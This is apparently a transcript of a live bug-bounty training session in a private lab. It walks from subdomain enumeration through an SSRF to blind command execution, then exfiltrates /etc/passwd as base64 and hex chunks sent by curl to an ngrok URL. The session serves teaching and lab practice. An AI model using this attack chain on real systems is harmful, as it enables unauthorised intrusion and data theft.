So, guys, we have 1 hour session for today. I think so, right?
Yeah, right.
Okay. So, uh, I want that session very interactive. So, I just want you to be with me. Okay. And I will definitely try to cover everything which is very different from any other thing you can find on, uh, m- m- uh, some kind of article or your Twitter feed or something. I'll try to figure out and I try to, provide you that information which is not over there, right? So we will start definitely. And sorry about this also. I'm going to share my screen very soon. And I hope you can see my screen now. Right? Cool. Okay. So for today's session, we have something amazing. Uh, so the topic for today is actually DNS exfiltration, right? You have an idea about it? You heard about it 1 week or 2 week before? So let me just start with that session with my introduction. And I'm really sorry, Reset Hacker, I don't have that much time to prepare that presentation. So I'll try to do things practically. But still, I have this small piece of presentation just to introduce you, me, and obviously Reset Hacker also. This is an amazing organization, right? They'll
Yeah,
provide you amazing kind of information. Okay, so this is what we have. So according to me, you just need to understand it like what we are going to start and where we supposed to end it. We will start it as a bug bounty hunter or a hacker. Okay, and I assume it that we have many bug bounty hunters as well in as our viewer. So we will start our session as a bug bounty hunter, and we will end it with some kind of different area, which is actually related to the back end of any organization you are hunting on. Okay, so this is our topic. It's just to uh, it's just for that click moment or something to identify that you are going to learn something beyond bug bounty. Okay, you just need to understand it like that. Okay, so and I just want to give a credit to Reset Hacker. Thank you so much to invite me, and you need to subscribe it also, guys. Okay, so give me a second, please. Then I'll show you something. I supposed to introduce myself. I just need a second, please. Second, please. I'm so sorry about it. Okay, so what we are going to do is, thank you so much, Reset Hacker. We are ready to go. Uh, so guys, first I need to introduce myself. I'm Dheeraj Madhukar, and I'm a security researcher or a corporate trainer. I provide training in cybersecurity to students, professionals, obviously bug bounty, some of bug bounty hunters, and many government organizations. And I'm in this area from last 7 to 8 years, and I'm working with many well-known government organization, which is like Indian Air Force and something. I'm sorry about this also. So This is about me. I'm not going to waste my time to do theoretical thing in this session. I will switch everything to practical very soon. And if you want to know more about me, or you want to contact me related to anything related to this session, or anything related to technology, you can ping me or you can contact me over there, right? This is my Twitter handle, LinkedIn, Medium. You can read some kind of articles on Medium. And yes, obviously, for uh, coffee session or beer session, you can contact me on Instagram. Okay, so let's move to the next one. So as per the presentation, as you can see, there is a simple quotation from my side, which is, there is just one way to do security is together. And yes, exactly, this is what we are doing right now, right? So okay, let's move to, oh sorry, let's move to the next area. So first thing first, you need to understand it like, you will do something related to beer. No problem. Okay, let me show you something very amazing. So, guys, for today's session, we will act in two different ways. Number one, let's come to the practical. Okay, so because we have very less time for today's session, so let's start with something. Let's assume it. This is your first area. We will act, or we will work as bug bounty hunter. Okay, we will act as bug bounty hunter, as you all do every day. I hope so. Okay, so just understand it like this: you are a bug bounty hunter. What you are seeking, or what you are looking for, you are looking for a program, right? बहुत ही straightforward लेने वाले, right? Let's come to the point. Very straightforward. You will looking for a program. They will provide you obviously money, right? Right? And some of you will say, no, we are looking for knowledge. That will be very nice. You're looking for knowledge also, right? So let's start with this. So you're supposed to find a program with, I think, according to me, some kind of bounty, or at least 4-digit bounty, right? And then you will find out, or you will read about the scope, and out of scope area. For new people or new person in this area, let me tell you about this. Scope means what you are going to interact with, and or you can say this is allowed to perform tests, or your to perform penetration testing or some kind of hunting. Okay, so and out of scope says where you cannot perform that activity, that will consider as illegal. Okay. And okay, one more thing I have to show you that this is my duty to show you this. Let me show you this, which is very important. This is my duty to show you that disclaimer, right? Okay, so I know you will never read it, or I don't think so आप लोग मानने भी वाले हो, but I have to say this. This session is for educational or research purpose only, and obviously to make money. And do not attempt to violate the law in anything contained here. Okay, and we, that means me and Reset Hacker, will not be held responsible for any criminal activity. Okay, and especially for those जिनका अभी recent breakup हुआ है, right? Do not harm, hurt, or revenge to your ex. Okay, now let's come to the point again. This is the disclaimer for you all. Now, so you will looking for scope and out of scope area, what you can do or something. Suppose we have something amazing. You have something amazing that you have wildcard in scope. Okay, and whatever the target domain. So it's target.com something like that, right? And you are looking for something in this. So for today's session, specifically for today's session, we have our own domain. Let me clear this. We have a private domain. Okay, this is the private DNS configuration. Okay, this is not a public domain. This is completely private domain. This is just to inform the owner of sniper.com or something like that. This is not related to any organization. This is completely private. Okay, and I configured it manually on our virtual machines. So this is private, and this message is to understand it, that is private. Okay, but you need to assume it like you are working on a real target. Assume it like that. Okay, so we have this in scope. So you can say we have wildcard scope, right? And this is a good news for a bug bounty attacker, hacker, right? Bug bounty hunter or something like that. Okay, and this is really very good news. We have wildcard domain. We can do whatever we want. Okay, so I'm assuming it that in the audience or viewer, we have many bug bounty hunters, right? So please interact with me and make this session so amazing. So please let me know what will be the first step of your what exactly your first step to perform bug bounty. As we all know, the first step is recon, right? So you will do recon, and let me tell you one thing. This is the entire infrastructure. I will definitely introduce about this infrastructure later, but this is our attacker machine. So assume it like that. Okay, so we have this server, we have this something else which is also related to this, and we have another machine also. So I will definitely introduce you about it, what exactly the infrastructure we are working on. But right now you just need to assume it like we have this target domain. This is the wildcard domain and we are working on it. That's it. According to a normal attacker, we will do something like, yes, he is right. He says we need to do what? We need to enumerate the subdomains. Exactly, he is right. This is so nice. So we have a running machine which is this and that. So I configured everything manually, just for you guys. Okay, everything is actually configured manually. So I will definitely tell you about everything one by one. So this is our attacker's machine. Started, and we will hack everything. Hack the world, or you can say like hack a day. I like this. Nice. So first of all, I love Linux. So everything is actually running on Linux. I don't have any Windows machine in this network, so I'm sorry about Windows lovers. I personally like Linux. That's why. Okay. So guys, let's start something amazing. So your first step, as you told me, please be interactive with me in chat area. Okay. So as according to you, I will do everything whatever you say. So we just need to perform sub enum, right? Okay. And what will you do in subdomain enumeration? We have a wildcard, right? So what you will do? You will use some kind of tool, right? You will use oh, sorry. You will use I think so. Some of you use AMAS, right? Some of you will use sublister or etc etc etc. Amazing. You will use subfinder, find domain, or something something something. And I think, and I definitely hope that you all know about active and passive enum, right? You all know about it, which is active of or passive enum. And active is basically you are going to directly interact with the server. That is called active. We all have active conversation right now, right? And passive is like let me tell you, you and your girlfriend, let see. I'm just waiting to show you my painting skills. This is you. Okay, you. Exactly, through a third party. And this is your cute girlfriend. right? So that kind of connection is active. Sorry, that kind of connection is active, and your girlfriend's BFF, your girlfriend's BFF is basically when you're talking to your girlfriend via him with the help of your BFF, that is called passive connection. And I'm sorry for that worst example. So let me tell you, when you do passive enumeration, you will use Google, you will use some kind of search engine or something like that, right? And we are not going to do anything related to this because we have our private lab and we will do everything actively. Okay, so keep that in mind. Okay, guys, keep that in mind. We will do everything actively because we have the private session. Okay, we have this private lab. So what you will do, let's create a small list named as subs.txt. Okay, and let me show you directly. We have this file named as subs.txt, and I wrote many subdomains like www API or something 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 something, right? We have this. So now what you will do, we are going to enumerate something. Let me just copy it for you and paste it over there. So we have this file and we are going to enumerate this, right? So let's create something like while read hyphen r, that will help you to enumerate, right? Do something, and let's type echo. And I'm really sorry about this. uh, some of you will say you can use host command, and unfortunately my host command is not working right now, and I'm not completely not in the mood to troubleshoot this. So I'm just going to use dig. Okay, so let's type echo and dollar line dot we have the domain called sniper.com. So please try to manage the same with me, and we will dig plus short because we don't want the complete output from this dig command. And let's try to figure out something like that. Okay, try to manage it with this. Okay, and we will filter out everything and paste it somewhere else. Or you can do it like this also. You can type hyphen n. Hyphen n is basically do not print after print this. That will print in the same line. Okay, the output will print in the same line. So let's type done, and as standard input you can provide the subs.txt. So what will happen, that will start a while loop, and that will read command is basically used to get input from your user. Okay, so whatever you will read as input, so that while loop will read every line one by one. So and we will provide input named as subs.txt. So that will read every line one by one and put everything over here. That is the representation, how you can represent the variables value. So dig command is basically used to resolve the domain, and we are going to do this. And whatever domain will resolve, and we will have the IP address of that particular one. Are you good with this? Drop me a thumbs up. Let me copy this for you. See, this is just an active enumeration. Okay, so now what we will do, we'll do something like, let's just hit enter. Amazing. So okay, let me clear this output. See, I'm not going to show you everything because we have limited piece of time, limited window for our current session. So let me copy this and show you something like what we have for today. We have one domain named as this. So let me make it clear. And we have another domain named as this. Okay, this is nice. This is how you can find out the subdomain, like using this. And we have another one is this. Okay, so you found three subdomains. Okay, tell me, is this clear to all of you? So we have three subdomains. Okay, this is your first step, right? What you will do next? Tell me what you will do next. Now we have all the subdomains named as this, and that. Now let me just copy it named as dns.txt. First, uh, your sorry, your first domain is this. Your second domain is API, and third one is master.sniper.com. Okay, this is all we have dns.txt. Now what you will do? What is your next step? You supposed to resolve everything. You supposed to visit it manually or something like that. So let's visit it. Let me open the Firefox and we will visit every domain, right? So let's try to visit every domain. What we have www.sniper.com, www.sniper.com. Hit enter. It says you are using proxy. Let me remove this proxy from here to no proxy, and let's refresh this. Oh, amazing. So over there you can see we have a public server. It's a public facing server. Okay, it's public facing server, and www is a public facing web server. You can easily read it and understand it what we are actually working now. So you are saying you are doing what? You are visit all subs, right? This is your second step, right? And what you will do, you will also do what? You will figure out what kind of technology that particular subdomain is using. That can be your second step also. So this is the first area. Now let's move to the next one, which is API dot something, api.sniper.com. And your third one is master.sniper.com. Amazing. Okay. So on the master.sniper.com, we have the default Apache web server, right? Okay, it's just a common default Apache page. Whenever you configure basic Apache server, this is what you will see. And okay, api.sniper.com do not working on this one, right? It's not working on http or something, so let's remove it. We will only work with this particular thing. Okay, so now we have an idea about what kind of active domains we have. Active subs we have only two active subs, number one and number two. Okay, so you will find out all the active subdomains. Let me make it like this. Now tell me, what is your third step? It's working like http colon double slash, and it will also work like http colon double slash. Now what will you do? And don't tell me you will use nuclei. I don't know what exactly is nuclei or nuclei or something. We are not going to do this, okay? That will generate a lot of traffic, okay? Or nuclei improve this one also. This is also an amazing thing. Okay. You are saying we are going to do fuzzing. This is nice. We can do fuzzing. We can do directory buster, right? You can fuzzing, directory busting the particular thing. Okay, so let's fuzz this, copy. And what kind of fuzzer you are using, I don't have an idea about it. What kind of fuzzing you are using right now. So let's use the old school thing, which is directory buster. This is a small area, a small private thing. That's why I'm using this. So no, we cannot do wayback. Wayback is actually Pratik, wayback is basically related to your public areas, right? Your search engines or something. It's our private lab, so we are going to do everything actively. Okay, so we are going to fuzz it using directory buster. You can use whatever you want to use. Okay, so let's fuzz it. Fuzz this one first. Okay, see, you are helping me right now, and you are doing amazing thing. So what is interesting now? You can see what exactly the thing which is really interesting. As you can see, We have multiple 403, we have 403, and okay, we have 200, 200. So let's try to check this one, index.php. Obviously this is the same thing, index.php, or I think so HTML or something like that. Okay, it's doing the same. And okay, we have something named as secret. Okay, let's try to read it. Secret. So see, this is so amazing. So this will work if you are doing CTF, right? And we are not exactly doing CTF. So let's read something else. We have another thing is called robots.txt, which is also comes with 200. Let's try to read it. Robots.txt and hit enter. We have something, something, something. You can see. Yes. What? If you are up against, no, I will never do this if I'm against Cloudflare or Akamai. This is not Cloudflare, that's why I'm doing fuzzing directly. So as you can see, we have something disallowed, which is called /lab. Okay, so let's try to visit this. Sorry, let's try to visit this one /lab. We found something amazing over here. /lab. Let's copy this. Okay, and you can type it like this. You found this. So once you visit this lab, okay, so as you can see, now we have a proper website. Okay, a part of recon is done here. Now you can say we have a common or simple particular website. Now we can do something on it. We have a web page. Now let's figure out some kind of vulnerability, right? Let's make money. Yes, you can do param discovery, and param discovery is also okay. You tell me, guys. You tell me. Parameter discovery is related to active or passive. What you will say? For a second. Param discovery is active or passive? Answer me. We have 30 seconds. Yes, we can perform it actively or passively, both, right? So let me just remove it and let's figure out the website first. So if you have some kind of web page, you definitely need to visit that particular web page, right? This is the first step. You need to pretend as a normal user and understand what exactly is going on, right? So let's try to read it. And as you can see, outgoing webhook, since we are big and popular or something, something, and we will send update to your app whenever an event happens. Okay, this is just to understand a type of vulnerability. Okay, and you can test your webhook handler here, and the response will appear below. And this is the area where you can put your whatever webhook URL in this particular one, and you can test it. So what that particular server will do, understand it. Okay, now we are talking about a vulnerability. You need to understand it. Whatever sorry, whatever like something you will type like google.com and try to test it. Okay, so that will show the output over here, right? You can try blind ssrf or something like that. So let's try it. Okay, as you can see, we have another one is called master.sniper.com. So let's try it like that, http://master.sniper.com. So using understand it again, using sniper.com, we will try to access master.sniper.com. Okay, so once you click on master.sniper.com and click test it, what will happen? Whatever the output of master.sniper.com will print over here. As you can see, this is the entire HTML body, and you can see the same over here, right? So let me show you something again. Let's try to visit www.sniper.com. Okay, and hit enter. See, this is the output. Whenever you visit this, you will see this www.sniper.com. Hit enter. You can see, right? So the point is, by using www.sniper.com, whatever you will type as URL in this area, that web server, this particular web server will try to access this URL and print the output, whatever the output it is over here, right? So let's fire up the burp suite and we will do something good. I'm so sorry about it. It's burp suite. Let's fire up the burp suite and do something further in recon. Okay. So click on next, start the burp suite. I'm using the older version, so this is not the issue. You can use what kind of version you're using. So okay, let's enable the proxy. Our proxy is working on 127.8080. So let's configure the same. You can use multiple type of add-ons to configure your burp suite proxy, so don't worry about it. I'm doing the same manually. So right now we are working in the same. So let's check this one is working or not. So let me do it something like that. Okay, so this area is actually your burp suite and this one is your browser. So let's try to access this page again. And okay, so now we have this particular request for this sniper.com. You can see, okay, and when you click on forward, you can see the result. Now you have the website, right? This is the simple way how you can intercept the traffic. Now let's try to visit something like master.sniper.com and click on test it. When you click on this, you can see that particular sniper.com try to visit lab and a PHP page named as testhook.php, and that is a post request, and that post request use a parameter called handler, and that handler parameter contain the URL as value, right? So right click on this one and send the same to repeater, so we can repeat it and try to check that what exactly happening uh, in the request and response also. So when you try to visit it, click on send. You can see the entire area, right? You can see the entire URL over here, right? As or if you will change this like www, when you hit this, you can see the uh, content of www.sniper.com or something like that. Okay, so is this good till now? So we have something where you can find out something amazing. Okay, if everything is clear till now, please give me a thumbs up. So this is the entire request, and as you can see, whatever you will type over here, that will definitely do something. Okay. So now what we can do now, as you can see, if you will do something, if you will change something over here, that will send that particular request to sniper.com. Okay, and sniper.com will visit whatever you will type over here. So let's do further recon again. Okay, we are going to do recon again. Okay, and what we will do sub enum using the same method. How you will do this? See, you can see over here, when you type try to resolve all the subdomain, you will only find out those subdomains, and these are all public facing servers for any organization. You have permission to visit them. Okay. Always keep that in mind. There is something behind the scene whenever you try to visit something, or whenever you try to visit something over the internet. So this is what they want you to see. That means this is what sniper.com organization want you to see. So this is the area. Now let's identify the hidden subdomains. How you can identify the hidden subdomains? We are going to perform subdomain enumeration on this request. How you can do this? So let's right click on this request, send it to the intruder. Intruder is a part of Burp Suite that will help you to perform some kind of payload or attacks on whatever kind of request you are using. So let's go to position, and this is the entire way you can clear the position, and you can see this is the domain. So your sniper www.sniper.com will help you to visit whatever you will say, right? So this is the area where you can put your subdomain and try to access it. Let's add your payload area over here. Okay, this is the position of your payload. Click on payload now and paste the same. Oh, I'm so sorry. we don't supposed to paste it. Let me clear this. Okay, so let's load the same subdomain list. See, I hope you remember this. We have this subs.txt. We have multiple subdomains over here. Okay, and once we use it to identify subdomains, we have only 3 subdomains. Now we will use the same and put all the subdomains in the area of this particular section. Okay, and we will send this request repeatedly with different type of subdomains, and we will see what will be the output for this. So let's try to select it and click on it. Okay, so we have multiple subdomains, and what intruder will do, that intruder will put everything put everything in this particular position and try to figure out something. So let's click on attack, and as you can see, we are using community version of Burp Suite. So it says that feature will work good in professional version, so it's okay, we can manage it. Okay, so you can see, so when that server visits something named as www or something like that, it says when you visit www.sniper.com, the response is obviously this. So you can say the length is this. When the server try to visit api.sniper.com, it says there is nothing over there for api.sniper.com. And when the server try to visit QA, so you can see if your request is not complete or the output of your request is 0, so that content length is 213. So you can see everything is 213 now, but there is something different over here. Okay, let me check this one. Let me just click on it. I think we need to do something. Actually, it's internal server, so sometime we need to manage it. uh, Actually, I just restarted, so the DNS configuration is changed, so I just need to do a small thing, so don't worry about it. Okay, I just need to put that server in our internal DNS area. Okay, so okay, now everything is fine. So what we will do, we will do the same thing again and try to resolve all the subdomains again. So let's try to run the attack. Okay, as you can see, when the server tried to visit www.sniper.com, it says okay, the content length is 279. That will try to visit this, and the output of this one is nothing. Then it will try to visit this. Okay, let me check. I think we have some kind of issue over here. Give me a second, just a second, please. See, this is all manual work. Okay, so the problem is the IP is not configured over this machine. So let me just restart the service. Systemctl restart, it is network manager, and that will work. Okay, we have the IP address. This is so cool. And Resolve.conf will also work. Let me just need to do something with it. Don't worry, I will tell you about everything. Okay, I just need to add this. So let me do this again. So actually we are working as bug bounty hunter or administrator or everything. So let me do this again. Okay, because the output is different, because our server is not connected to our internal infrastructure. So I hope right now it is connected. So let's check the difference in the output. I hope that will work now. Okay, everything is all right. Are you okay? If everything is all right, then we can move on. So as you can see all the output response is 213, and let me show you this. Let me show you this 213, 13, 13, 13, and okay, you can see we have 243. Oh my god! So on 243, we have something in the response. Is says internal dashboard. So it says there is something running on dashboard, which is basically dashboard.sniper.com, and the output of this is this. So okay, this is the hidden subdomain. We found it, and let's try to visit it manually. Okay, let me show you this. Let's we found a new subdomain which is hidden. Okay, it's a hidden service. Okay, so let's try to visit it now. Open this and try to visit dashboard.sniper.com. Okay, we cannot access it directly, right? We cannot access it directly, but we can access it when we type it over here. See, when you type it, and whatever the output of this one is, this. See, when you click on test it, and the output of this one is says internal dashboard. So I think this is really amazing. That is called ssrf. That bug is basically called. So on this ssrf is server side request forgery. uh, okay, let me tell you one more thing. So where you found ssrf is actually on www.sniper.com. This is vulnerable to ssrf, right? This is so good. So you found one bug, and you can access the internal dashboard. So this is the internal dashboard, or you can say we have an internal domain. By using the ssrf payload, you can access it. Let me show you this. When you type dashboard, see, when you type dashboard and hit send, you can see the hidden content over here. That is basically what? That is ssrf. Okay, when you found ssrf, what you will do? You have ssrf right now, which is that www.sniper.com is vulnerable to ssrf. Now what you will do, guys? Tell me what you will do. I think many of you will report it, right? So I definitely do not prefer to report it, because I love to chain vulnerabilities. Okay, and we will lead something ssrf to I don't know what. So let's figure out this also. We will do something like that. Right? We can scan many things. We can scan like we can scan it like let's try to scan colon 22, right? Let's try to do this. Colon 22, it's not working. You can type colon 80. Obviously it's working. You can obviously you can say you can perform port scanning, and you can identify that what is running on this particular port or something, right? So let's try to do something like that. So now you know how to identify subdomains. Let's do directory busting. Yes, this is nice, Pratik. we will do fuzzing in internal area, directory busting in internal server. Okay, what you will do in directory busting? So let's create a simple word list. So let's create something like what? Words.txt. Let's create something like admin that will help you, or what can be possible? Admin or stage or query or data or dashboard. Sometime that will also happen, right? Administrator, yes. So we can do many other things like this. So let's save it and right click on this and send it to the intruder again. Yes, obviously this is also an important one, which is login. Yes, Dave is also important. So let's save it. Right, we have multiple words over here, so let's change this one also to Dave and save it. Now we have another request in our particular this, so let's clear everything and put something over here. So we will apply our directory list on this one. Go to the payload and select your word list. Okay, this is the word list, and send the request, and we will try to check what kind of data we have. Rahul, I have no idea this session remains on YouTube or not. So, okay, guys, focus on this. We have a lot of things to do. See, uh, admin is 497, and okay, everything is 497, but we have something amazing over here, which the content length is 542. So I'm damn sure there is something running on slash data. Let me check. Okay, that says slash data says 301 and move permanently. So let's close it, go to this particular thing and try to access it slash data. Amazing, it says something running over here. So we have internal directory found this slash data. Amazing. So let's try to visit it. Put the slash over here. So 301 will not work. We have 203. Okay. So guys, we have something amazing over here. We have another dashboard over here. See, which is running on data. If you want to see the HTML part or visual part, you can right click on this, show the response in the browser, and let's go to the browser and put it over here. Send it. Okay, so we have something over here now, right? So it says this is the internal dashboard which is running on this. Amazing, I like it. And it says, oh my god, remote command execution. You can type whatever the command over here and that will give you some kind of output. This is so good. But guys, there is a problem right now. See, we cannot type anything and hit submit and that will work. It says file not found, boss, because we cannot access the dashboard dot something directly. So what you will do, you will look for the source code, right? Yes, the idea is really amazing. You will found this one so good, and I will definitely show you something out of the box right now. I mean, after we perform like bug bounty hunter or something. So let's read the source code carefully, and we will do something related to this. See, we have remote command execution, and oh, okay, this is the interesting area. I need to copy this and try to read it manually. Okay, so we have something amazing over here. This is the piece of code which I'm interested in. So okay, this is so good, and I'm interested in this one. Let me clear this so we can read it properly. Okay, sorry. This is the area. As you can see, it's a form. We have a page named as index.php. So the final URL will be index.php. Okay, and let me copy this and type it over here. Okay, So this is the index.php, and method is get. This is so good. Method is get, nice. And we have the input area over here, and that input area is text, and that input area contains a placeholder or something. So we are interested in this one. It says user input, so we need to put something in this. So this is the variable in the text area, so you can put it like this, right? User underscore input, and whatever you will type, that will goes to the server in the get area. So that means you need to put something like this. So this is the final payload. So let's copy this payload, okay, and try to put it in the request over here. So let's try to do something like that. Let's paste it and type a command called id. When you click on this, and you can see the output. See, we have a lot of lines over here. Just to identify that our thing is working or not, you just need to identify the response code. So when you try to execute, okay, so let's try to create a payload for RCE, which is remote code execution. Okay, and we are going to execute a command called id. ID is the command to show the UID and GID of the current user, which is running on the server side. So this is the final payload. So when you visit the normal website, the content length is 400,337 bytes. And when you try to put the payload and access it, the content length is same. See why I'm talking about this, because you have a lot of lines to read. So you don't need to go through with the every line. You can easily read the content length, and you can identify your payload is working or not. So let's try to do this. And when you execute it, the content length is same as the previous one. That means your command is not executing right now, not executing. So when you are doing something and it is not executing, that means this is not dead end. You can, that means that vulnerability is saying something to you. It says uh, you need some motivation, and it says try harder. I'm better than you. So you need to try harder. So how you can do it? See, I have no idea that command is actually running or not. So let's try to do something else and figure out. Yes, we can see the response in the browser. So let's right click on it, show the response in the browser. Okay, let me execute it one more time. ID command, send it, right click on this, show the response, copy, and see the same in browser. Okay, let me paste it, enter, and you can see we have nothing over here. Okay, that's why I'm saying our response code is just same. So we need to try hard. So now I have an idea that it is, or you can say it might be blind RC. Blind RC is in this that kind of thing. You will not, that server will not provide you some kind of response of any command. So you can see, you can try something amazing. You can try something like in Linux we have a command called sleep, and you can put space and type 10 seconds. Okay, so let's try another one. Okay, let's try to something like let's remove it and type sleep space 10. Yes, we can change the method and try. We can do a lot of things. So let's focus on one thing, right? So let's hit enter. It says, boss, I'm not going to execute it. And that may be because of this particular space. So what you can do, you can type like %20. %20 is the part, URL decode encoding for space. Or if you want to do it manually, you can type it like, you can type space and encode it as URL, and you can see space is basically %20. So you can type send, and again it says, no boss, I'm not going to work. Your %20 will not work. over here. Okay, let's try to figure out something else. Let's try to do with plus sign. Okay, and let's hit enter. If my command will execute, so the response will come after prox 10 seconds, right? So let's hit send. Again it says no, it's not going to work. Okay, this is so good. Okay, so let me try something else. We can use ping space, or something we can do what hyphen c, which is the count. Okay, hyphen c is basically count, or we can ping to localhost 0.0.1, and let's try to hit this. Okay, it says Mathu, what do you do? I'm not going to work. Okay, that is cool. So let me do something else. I don't know why it's not working. Let's try something else. ये तो मेरी बैंड बजा रहा है. Let's try to do something is like that. Okay, it's not working. So maybe because of that plus. So let's encode that plus sign also. Sorry, let's encode this plus to URL, and it is %2b. So let's try to put over here, which is %2b, and hit enter. Aha, that I think that is working. So it works now. So we don't have response, and we are exactly waiting for 10 seconds, right? Time delay. We are confirming blind RC with time delay, and you can see the response code is same, but the time delay is 10 seconds. This is nice. So we just need to encode something. You need to just apply URL encoding, and you just need to change plus to percent. What exactly it is? %2b. It is %2b. Amazing. So now what we can do, we can confirm that is our payload. This is the final payload. Amazing. Now let's do something serious. Okay, sleep command will not help us. That will not help you to create or make money. Sorry. So what we can do, we can do something amazing. What we can do now? Okay, so let's try to read cat space etc pass wd, and you love it when you perform web exploitation, right? So that will not work. Rm space hyphen r. That will lead you to jail. Do not try this, guys. So let's try to read this file, cat etc pass wd, and hit enter. And it says, boss, everything is working, but I'm not going to give you anything related to this. So we have something blind, but we cannot we cannot read the content of server. This is really nice. But what we can do now, we need to hack something, right? So let's do something what we are here for, right? DNS exfiltration. This is really nice. So what exactly is DNS exfiltration? So let me tell you a little bit about DNS. DNS is domain name server, okay? And why we are using DNS, and that will help you to resolve name to IP. I am so sorry. This is really very basic, but I have to, brush up some things related to this. IP to name. This is how DNS works, right? So let's remove it. We have multiple types of RRs. RRs are basically regional records. So regional, sorry, it's not regional record, it's resource records. So we have many types of resource records in DNS, which is A, PTR, I'm so sorry about this, CNAME, and MX, and something more, and etc. etc. We have a lot of resource records. A record is address record, right? So that is basically used to resolve name to IP. PTR is point to reverse. PTR is basically point to reverse, right? Point to reverse is point to reverse is basically used to IP to name. Okay, that is so cool, and you have complete idea about it. So let's do something related to DNS exfiltration, and then we will talk about the organizational part, right? Right. So we will use host command. You will use dig command to resolve something like this. So you will type. Yes, we have NS and a lot of type of this. So we can do what? We can do sniper.com. So that will help you to resolve it. So, and this is the attack. Okay. So we are actually talking about DNS exfiltration attack. And I'm going to, show you something about this. So let me show you. So when you type this on your machine, so you will type something like that. See, like this. So that will give you an answer. Okay, and now focus on this one right now. This is the DNS server. We are running this DNS server on CentOS 8. Okay, and this is the real DNS servers. You can understand it like this is the sniper.com, the real DNS server, which maintain all the records, and that is actually responsible to resolve everything for you. Okay, so let me show you. See, so these are the logs. When you try to resolve it, see, when you try to resolve it, server contain the log that someone tried to resolve sniper.com. Let me increase this. Okay, so you can see it. Or sorry for this mess. Let me, make it clear. Let's awk it and do something like it's 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12. Okay, so let's print 11 and 12. Hit enter. Now you can see. So whatever you are querying for, that is actually showing something like this. Okay, so let's try to resolve it. Hit enter and it says, okay, someone try to request for this. When you try to resolve this, so it says, okay, someone try to resolve sniper.com. When you try to type it like, please don't hack me, hit enter, it says someone tried to resolve please don't hack me .sniper.com, but we don't have an answer for this. So it is good, but this is how DNS works. These are all the logs for our DNS server. So what exactly the DNS exfiltration is? We are going to create a payload for this, and how you can perform it? You can perform it like this. See, let me show you the payload. Now we will do something like we will do like dig space dig, or you can perform ns lookup. You have multiple commands for that. You have another command named as host. Every command will work in that case. %2b, and whatever the host name you are running on, right? Like suppose data.sniper.com. So when you run this payload, okay, what will happen? See, what will happen? Your sniper.server, your www.sniper.com will, run this particular payload and try to resolve data.sniper.com. Okay, so www.sniper on the behalf of this server, we are executing this request. Send it, and you can see the log. See, data.sniper.com is requested. Okay, this is so nice. Now we can do something amazing. Okay, so what exactly the DNS exfiltration? Let me show you. Let's create a variable called a. Okay, so when you use this variable and we want to execute a command and save the output of that command in the variable a, and we have a command called etc and /passwd, and pipe sign we will use head-1. Head1 means, that means only print the top one command, top first line. Okay, and pipe sign convert it into base 64. So let me show you the output of this command. Okay, manually. So what exactly the output of this command? See, let me show you this. Head1, that means print the first line. and convert it in base 64, hit enter. So that will convert it like this. Okay, this is the base 64 encoded value or of this output. So, okay, this is nice. So whatever the output of this command will goes to the variable a. Now you can use semicolon to execute another command, and we will use host space dollar a dot sniper.com. So what will happen? System try to resolve it and put it over here, and we will see the output in the DNS area. Let me show you this. So how you can create that particular payload. Okay, so but in that case, let me show you. We need to apply it like this. We need to change percent to be in the space area. So let's do it like this. Space. This is also space, and one more space. Amazing. I'm so sorry about it. And this is equal. We need to change it. Okay, let's try to do this first. How you can do this? You can put it over here and try to send it. Okay, it says it's running. Let's try to read it. Oh, see. So you are actually trying to access it, but let me tell you one thing. We are not the owner of DNS server, so that will not help you guys. We are not the DNS owner. We have only access to our machine. We cannot read the log of DNS server. This is just to show you something. So what we can do, we can do something amazing. We can first, if you want to perform this attack, you can start ngrok server. Okay, you can start ngrok server. So we can have the public URL on port 80 and get the URL. So let me run the same for you on this one, which is ngrok http 80. Now we have the public URL is this. So we have the public URL. So now let me remove this and let's try to do something like that. Let's try to access it by using curl space public URL slash $a. So what will happen? Your dashboard.sniper.com will try to execute it and put whatever the data in this, and we have complete access to this particular URL because this is our URL. This is our server, and you need to put it which is %2b. Okay, now let's try to execute it. Nice. So we need to remove it, right, and paste it like this. Okay, and whatever the data you want, you will see everything over here. So let's try to hack the server. You just need to type enter. Okay, everything is running, and now you can see we have something on this ngrok server. See, we have something over here. Let's copy this and try to decode it. Let me show you. See, you can decode it like base 64-d. Hit enter. Now we have the first area of this. So we have the etc passwd of dashboard.sniper.com. So let's do something more better. What we can do? We can do it like while read hyphen r, which is line, and put semicolon, do, then space. We are going to read everything one by one, right? Or we can do, we have something amazing. Let me show you. I have something good for you. I have something for you. I have a good payload for you guys. That will, I think that will help you in your case. I have something good. Let me show you. I just remember that I have something written for you. I create a simple payload for that. I hope I have something. Yes, yes, I have. Let me show you. This is also good, right? Okay, so we are not going to do this. We have a command called xxd that will convert it into hexadecimal, and we convert it into multiple areas, which is 24. Okay, and read every line in 24 chunks. So let me show you. See what will happen when you type this. Sorry, when you type this, hit enter. So this is the entire etc passwd file line by line. So we will execute it, right? And you just need to put this in this one, 2 and 3. Nice. And we will apply and execute it against it. Okay, this is cool. So what will we done? And we will type it like done. So okay, that will read everything, and that will work against it. How that will work? Let me show you. We will read every line from the output of this. Okay. So let's do it something like that. We'll read it like that. Okay, like this. We just need to use pipe sign. We just need to use pipe sign like this. Okay, this is the output of this command, and we will put it like line. Okay, system will execute it. Okay, and that will read every line one by one and use this to perform a curl request. Okay, so we need to put it %2b, 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 and %2b. This is the final payload. Let's copy the payload and focus over here. This is the ng of data. Let's execute it, paste it, and send the request. See, we have multiple requests over here. Amazing. So I think it is etc passwd, and you can read everything by using this URL. This is the ngrok URL. You can read everything. We have all the data. You just need to, copy it, and see, we are still receiving everything. So you just need to, echo this and xxd-p and reverse it. You just need to reverse it. Hit enter, and you can see this is the data. This is the data. You just need to reverse it. See, click on it, copy the data, and echo, paste it, xxd-print, and reverse this. And see this. This is how you can perform exfiltration on a particular server. So we can say now we will lead to SSRF to blind RCE to DNS exfiltration. Now you can, retrieve the data from internal server. So this is the topic. So guys, I know I take 15 minutes more. So please tell me how about this session, and then I need 5 more minutes to introduce the backend area when you're not working as a bug bounty hunter. Let me show you the organizational work also. So tell me what you say. How's this? So let me show you the entire network you are working on. This is the real network where you are working on. So let me show you something. This is highly firewall network. This is you, right? So you are working as an attacker. We can edit it. Okay, we can draw it over here, right? So you are working. This is nice. I never use it. So okay. So you are working as an attacker, right? And this is the front end firewall. This is the router, which is basically used to replicate the network. See, we need to use VPS or something. Let me tell you about this also. This is the master DNS. This is the master DNS you are working on. Remember that master.sniper.com. This is working on 91.100. This is the internal firewall. That's the public subnet, and it's the private 